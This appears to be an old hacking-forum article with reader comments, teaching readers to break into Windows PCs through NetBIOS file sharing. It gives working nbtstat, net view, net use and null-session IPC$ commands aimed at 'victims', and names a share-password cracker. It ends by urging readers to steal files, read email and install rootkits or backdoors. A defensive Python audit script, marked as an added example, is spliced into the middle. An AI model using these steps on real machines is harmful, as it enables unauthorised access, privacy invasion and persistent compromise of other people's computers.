Enigma Group's Articles




Rooting a Windows Machine : Lesson 1-NetBios Hack - Submitted By: DarkPontifex 2008-08-19 11:11:43
By common request I decided to write an article about rooting the most common operating system of all - Windows. I hope you find this informative and such. Umm, I'm not responsible for any dumb things you do and such, yeah.
 
Well, rooting is a really big subject, so I will just start with a very common yet highly powerful hack - the NetBIOS hack. This can easily be done
 
Searching for a victim
 
You may manually search for the victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If not, use a port scanner for ports 137-139 or a scanner specially built for NetBIOS discovery - Legion (available at cotse.com).
 
Let's Hack - Part 1: Remotely reading/writing to a victim's computer
 
Believe it or not, NetBIOS is the easiest method to break into somebody's computer. However, it's not all fun and games: if this person knows jack about security they will have disabled printer and file sharing. It is on by default, though, and most retards won't know what hit 'em.
 
Alright, open up CMD or Command Prompt.
 
The command that you will use to view the NetBIOS name is
 
c:\windows>nbtstat -a 203.195.136.156
 
Let's suppose that the output comes out to be
 
NetBIOS Remote Machine Name Table
 
   Name               Type         Status
---------------------------------------------
user           <00>  UNIQUE      Registered
workgroup      <00>  GROUP       Registered
user           <03>  UNIQUE      Registered
user           <20>  UNIQUE      Registered
 
MAC Address = 00-02-44-14-23-E6
 
The number <20> shows that the victim has enabled the File And Printer Sharing.
 
If you don't get <20> then you are probably out of luck. If you see "Host not found" then you have entered an invalid IP.
 
Now our next step would be to view the drive or folders the victim is sharing.
 
We will use the command
 
c:\windows>net view \\203.195.136.156
 
Let's suppose we get the following output
 
Shared resources at \\203.195.136.156
Ryvius (Computer Name)
 
Share name  
 
CDISK Disk
 
The command completed successfully.
 
"Disk" shows that the victim is sharing a disk named CDISK. You may also get some additional information, like
 
Shared resources at \\203.195.136.156
Ryvius
 
Share name  
 
HP-6L Print
 
"Print" shows that the victim is sharing a printer named HP-6L.
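
The two outputs above (the nbtstat name table and the net view share list) can be checked mechanically when auditing hosts you administer. The following is an added example, not part of the original article: it parses both outputs and lists what a host exposes. The sample outputs, the address 192.0.2.10 and all function names are constructed for illustration.

```python
import re

# Constructed sample outputs, modelled on the tables shown in the article.
SAMPLE_NBTSTAT = """\
NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
user           <00>  UNIQUE      Registered
workgroup      <00>  GROUP       Registered
user           <03>  UNIQUE      Registered
user           <20>  UNIQUE      Registered

MAC Address = 00-02-44-14-23-E6
"""
SAMPLE_NET_VIEW = r"""Shared resources at \\192.0.2.10

Share name   Type
CDISK        Disk
HP-6L        Print
The command completed successfully.
"""

# One name-table row: name, <hex suffix>, UNIQUE/GROUP, status.
ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
# One share row: share name followed by its type column.
SHARE = re.compile(r"^\s*(\S+)\s+(Disk|Print)\b")

def parse_name_table(text):
    """Return (name, suffix, kind, status) for each row of nbtstat output."""
    return [(m[1], int(m[2], 16), m[3], m[4])
            for m in map(ROW.match, text.splitlines()) if m]

def parse_shares(text):
    """Return (share, type) pairs from net view output."""
    return [(m[1], m[2]) for m in map(SHARE.match, text.splitlines()) if m]

def audit(nbtstat_text, net_view_text):
    """Summarise what the host exposes, as a list of findings to remediate."""
    findings = []
    rows = parse_name_table(nbtstat_text)
    # Suffix 0x20 is the file server service: File and Printer Sharing is on.
    if any(sfx == 0x20 and kind == "UNIQUE" for _, sfx, kind, _ in rows):
        findings.append("File and Printer Sharing enabled (<20> registered)")
    for share, kind in parse_shares(net_view_text):
        findings.append(f"{kind} share exposed: {share}")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_NBTSTAT, SAMPLE_NET_VIEW):
        print(finding)
```

Any finding it reports is a reason to disable File and Printer Sharing on that host or to restrict the share to named accounts.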
 
If we are able to share the victim's hard disks, folders or printers, we will be able to read and write to those folders or hard disks, or we may also be able to print anything on a remote printer! Now let us share the victim's computer's hard disk or printer.
 
So far we know that there is a computer whose IP address happens to be 203.195.136.156, that File and Printer Sharing is enabled on that computer, and that the victim's hard disk's name is CDISK.
 
After we have connected successfully we will have the C drive in plain sight just as if it was yours...
 
Lets do it.
 
We will use the NET command to do our work.
 
Let's suppose we want to make a drive k: on our computer and connect it to the victim's share. We will issue the command
 
c:\windows>net use k: \\203.195.136.156\CDISK
 
You may replace the letter k with any other letter.
 
If the command is successful we will get the confirmation:
 
The command was completed successfully
 
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
 
You will notice that this is your victim's DRIVE, YAAAAA!
 
Cracking Share passwords
 
Sometimes, for whatever reason, people put passwords on an EXTREMELY weak protocol. However, I did say it was weak, right? This means it can be cracked.
 
Windows 95
Windows 98
Windows Me
These OSs are easy to crack: just download the program PQWAK. It is simple to use; no explanation of the cracking features is necessary.
 
Using IPC$ to hack Windows NT, 2000, XP
 
Now you must be thinking of something that can crack share passwords on NT-based operating systems like Windows NT and Windows 2000.
 
IPC$ is there to help us. It is not at all a password cracker. It is simply a string that tells the remote operating system to give guest access, that is, to give access without asking for a password.
 
We hackers use IPC$ in this way
 
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
 
Note that you won't have full access, only limited access. You will have to get the Admin password from the SAM or guess it via SMB (next lesson).
 
 
Penetrating into the victim's computer
 
Well, now I am assuming that you have full control of his computer. Download his MP3s, read their email, and if you want to have a lot of fun put a rootkit or backdoor on their system in case they patch the NetBIOS vulnerability.

Comment By: hemiptera 2010-08-24 17:56:58
Hey!
Great tutorial, helps a lot!
But I got one question though.

when you use the
net use k: \\xxx.xxx.xxx.xxx\file
command

that just gets you access to the shared files of the "victim's" computer, right?
You can't access all the other files on his/her drive.
Or am I wrong? And/or in that case how do you actually get access to everything else?
Right now I'm trying this method out on my own computer just trying to figure that out.

Do more tutorials!
They're GREAT!
Thanks
/Hemiptera

Comment By: hemiptera 2010-08-24 18:01:54
P.S

assuming he or she isn't Sharing their whole C Drive.

thanks
/hemiptera
